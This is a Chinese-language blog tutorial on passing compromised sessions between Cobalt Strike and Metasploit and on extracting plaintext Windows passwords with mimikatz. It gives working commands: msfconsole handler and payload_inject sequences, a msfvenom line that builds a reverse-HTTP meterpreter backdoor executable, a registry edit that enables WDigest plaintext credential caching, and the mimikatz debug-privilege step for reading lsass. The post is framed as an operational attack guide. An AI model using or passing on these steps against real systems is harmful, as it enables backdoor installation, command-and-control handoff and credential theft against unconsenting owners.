首页 > 其他分享 >CS配合MSF互传权限 以及使用mimikatz抓取明文密码

CS配合MSF互传权限 以及使用mimikatz抓取明文密码

时间:2024-05-29 16:47:04浏览次数:26  
标签:windows exploit 监听 mimikatz 互传 CS msf msf6 payload

cobalt strike 与 metasploit 互传权限

1.cobalt传递权限给msf

启动server端
./teamserver [监听地址] [密码]
使用客户端连接:
image
生成一个监听器

image
在5555端口 服务端上监听

image
生成后门 可以选择以上几种

image
选择interact 模块进行利用

image
先生成一个外部http监听器
这里填写msf主机所监听的端口和IP

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
run

使用msf监听对应主机与端口

image
进行权限传递 使用spawn模块
选择
image
成功将权限传递给msf
image
总结一下 cs客户端生成木马 服务器监听对应地址与端口 等待目标主机上线 上线后 在msf主机上监听对应端口与IP 然后cs生成一个外部监听器 将会话派生一个给msf

2.msf传递权限给cobalt

使用msf生成木马:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.80.128 lport=8888 -f exe >> msf_shell.exe

这是一个反向链接的http木马 通过监听本地 8888端口来反链目标主机 传递数据
然后打开msf控制台监听端口与地址
image
使用windows/local/payloads_inject模块将权限传递给cs

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.80.133
lhost => 192.168.80.1
msf6 exploit(windows/local/payload_inject) > set lport 8855
lport => 8855
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1

用cobalt生成一个监听器 监听服务端 端口和ip与msf一致
image
成功互传权限

mimikatz抓取明文密码

windows 在传递密码时一般使用hash 但在第一次传递密码时 需要一个程序将目标处理变成hash
这时就可以在该进程(lsass)中抓取明文密码
存在前置条件:注册表中UseLogonCredential项必须为1
这个是该项的具体位置HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
可以使用shell对该值进行修改

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

image

并且密码只能在用户登录时才能抓取

mimikatz.exe privilege::debug

抓取明文密码
image
成功

标签:windows,exploit,监听,mimikatz,互传,CS,msf,msf6,payload
From: https://www.cnblogs.com/fr09/p/18216740

相关文章

  • Blocs for mac(优秀的可视化代码编辑器)v5.2.4版
    BlocsMac版是一款优秀的的可视化Web开发工具,专为追求高效、直观且无需深厚编程知识就能创建现代化静态网站的用户设计。这款软件以其强大的可视化编辑界面和简易的操作流程,让用户无需深入了解复杂的代码编写,也能轻松构建出高质量、现代化的静态网站。Blocs不仅加速了网站开发......
  • CSS3 超实用属性:pointer-events (可穿透图层的鼠标事件)
    1、是什么pointer-events 直译为指针事件,该属性指定在什么情况下某个DOM可以成为鼠标事件的target。简而言之,就是允许/禁止DOM的鼠标事件(click事件、hover事件、mouse事件等鼠标事件)2、具体属性分析用法分析:pointer-events:auto|none|visiblePainted|visibleFill|......
  • css通过子元素选择父元素的实现示例
    在CSS中,直接通过子元素选择其父元素并不直接支持,因为CSS的选择器是从上到下(从父元素到子元素)进行选择的,而不是相反。但是,你可以使用其他方法或技术来间接实现这一效果,比如使用JavaScript、jQuery或其他脚本语言,或者通过调整你的HTML结构和CSS样式来达到类似的效果。不过,我可以给......
  • CSP历年复赛题-P1308 [NOIP2011 普及组] 统计单词数
    原题链接:https://www.luogu.com.cn/problem/P1308题意解读:给定单词a,文本b,在b中找a的个数,并找a第一次出现的位置,注意b中任何位置可能含有多个连续空格。解题思路:通过双指针找b中每一个单词的首、尾位置i,j,与a进行一一比较即可。注意1:比较时不考虑大小写,可以统一转成小写字符tolo......
  • css 特殊进度条
    <!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible"content="IE=edge"><metaname="viewport"content="width=......
  • CSP历年复赛题-P1199 [NOIP2010 普及组] 三国游戏
    原题链接:https://www.luogu.com.cn/problem/P1199题意解读:人机轮流选将,电脑策略就是破坏可能和人已选能组成最大默契值的将,问人是否必胜,求出站的一对武将的默契值。解题思路:贪心题通常比较难以下手,经过分析,人肯定不可能选到每一行的最大默契值,因为电脑会破坏;进一步思考,那人能......
  • css实现按钮文案垂直水平居中,按钮左侧图标相对文字固定距离展示
    需求css实现按钮文案垂直水平居中,按钮左侧图标相对文字固定距离展示,效果如图: 实现方案一:使用margin-right来实现按钮和左侧图标的间距<divclass="download-btn"><divclass="btn-content":class="{'left-icon':showLeftIcon}"><div......
  • ElasticSearch之Doc结构中常规操作(新增字段、查询数据)
    背景:腾讯云上的ElasticSearch服务,操作客户端:Kibana1.在ES中指定doc_field_name内部新增字段的指令:PUTes_index_name/_mapping/${doc_field_name}{"properties":{"newFieldName":{"type":"integer"}}}备注:其中”es_index_nam......
  • python中使用win32com实现Excel转CSV
    Excel转csv可以使用pandas的to_excel、to_csv实现转换,但是当Excel文件较大时,pandas耗时会较多,可以考虑使用win32com实现importwin32com.clientxl=win32com.client.Dispatch("Excel.Application")xl.DisplayAlerts=Falsexl.Visible=Falsexl.Workbooks.Open(Filename=......
  • 用python字典统计CSV数据
    1.用python字典统计CSV数据的步骤和代码示例为了使用Python字典来统计CSV数据,我们可以使用内置的csv模块来读取CSV文件,并使用字典来存储统计信息。以下是一个详细的步骤和完整的代码示例:1.1步骤(1)导入csv模块。(2)打开CSV文件并读取数据。(3)初始化一个空字典来存储统计信息。......